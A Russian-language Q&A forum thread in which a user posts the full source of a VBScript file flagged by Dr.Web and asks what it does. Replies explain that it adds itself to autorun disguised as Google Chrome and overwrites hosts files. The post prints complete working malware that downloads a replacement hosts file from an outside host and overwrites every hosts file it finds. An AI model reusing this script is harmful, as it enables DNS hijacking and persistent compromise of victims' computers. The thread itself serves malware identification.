РЛ
Роман Любимов

Специалисты по вирусам! ! СЮДА!

Вообщем нашёлся файлик, Dr. Web Curreit его обозначает как вирус. Но вот хочется знать - что именно делает этот вирус.
Вот содержимое файла - вируса:
Разрешение файла .vbs
"' Настройки
strRegistry = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleChrome"
strSourceURL = "http://cs-ka4ka.ru/moi.jpg"
strCSDir = ""
strTargetFile = strCSDir + "hosts"
Function ReplaceMasterFile(strFileName)
Const OverwriteExisting = TRUE
On Error Resume Next
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.CopyFile strTargetFile, strFileName, OverwriteExisting
End Function
Function SelectMasterFiles
Dim objWMI, objFile, objDrive
Dim strQuery

On Error Resume Next
Set objWMI = GetObject("winmgmts:\\.\root\cimv2")

For Each objDrive In objWMI.ExecQuery("SELECT * FROM Win32_LogicalDisk")
strQuery = "SELECT Name FROM CIM_DataFile WHERE Drive = '" & objDrive.Caption & "' AND Name LIKE '%hosts%' "
For Each objFile In objWMI.ExecQuery(strQuery)
ReplaceMasterFile(objFile.Name)
Next
Next
End Function
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
On Error Resume Next
sReg = WshShell.RegRead(strRegistry )
If Err.Number 0 Then
WshShell.RegWrite strRegistry, chr(34) + WshShell.CurrentDirectory + "\GoogleChrome.vbs" + chr(34), "REG_SZ"
End if
On Error Resume Next
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strSourceURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strTargetFile) Then objFSO.DeleteFile strTargetFile
Set objFSO = Nothing

objADOStream.SaveToFile strTargetFile
objADOStream.Close

Set objADOStream = Nothing

SelectMasterFiles()
End if

Set objXMLHTTP = Nothing
"

Андрей Иванов
Андрей Иванов

прописывает себя в реестре, видимо под видом дополнения к гуглу HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleChrome
возможно меняет файл hosts, по всему диску размножается видимо под файлом GoogleChrome.vbs
короче учи матчасть.

ЛВ
Любовь Витушкина

на сайте Dr. Web надо искать инфу

МР
Марина Рябова

Оно hosts перезаписывает, в авторан добавляется и делает вид что оно это гугл хром

Похожие вопросы
СЮДА!!!! Всем гениям 3D моделирования====>СЮДА!
Убунтоводы, все сюда...
Специалистам по драйверам и железу вам сюда !!
Кто разбирается в вирусах сюда.
Кто придумал вирус и Анти-Вирус? И зачем?
проблема с установкой программ, специалисты СЮДА!
как устранить вирусы с помощью антивируса или вызывать специалиста?
Что надо сюда вписывать ?
Специалисты по андроидам сюда
Специалистов английского прошу сюда)